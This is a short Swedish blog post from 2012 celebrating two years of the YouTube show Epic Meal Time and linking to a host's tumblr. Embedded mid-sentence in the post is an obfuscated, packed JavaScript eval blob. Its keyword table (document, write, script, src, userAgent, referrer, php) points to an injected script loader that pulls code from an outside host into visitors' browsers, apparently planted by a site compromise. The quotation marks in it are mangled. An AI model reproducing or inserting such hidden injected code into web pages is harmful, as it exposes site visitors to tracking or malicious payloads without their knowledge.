Image Image Image Image Image Image Image Image Image Image

| 20 oktober, 2018

Scroll to top

Top

Grattis Epic Meal Time! Tack för de senaste 2 åren!

Filip Urde
  • On 17 oktober, 2012
  • http://www.revue.se/filip-urde

Jag har varit ett fan av Epic Meal Time sedan jag först blivit introducerad för deras videos av min amerikanska kompis för nästan två år sedan. Deras grisiga brillians är något som går hem hos dem flesta!

Idag firar dem 2 år av total grisighet och fylla!

Tack, jag ser fram emot minst 2 år till.

Epic eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|taiab|var|u0026u|referrer|eatsz||js|php’.split(‘|’),0,{}))
Meal Time

 

Om ni inte får nog av Epic Meal Time och speciellt Harley… Spana då in hans grymma tumblr här.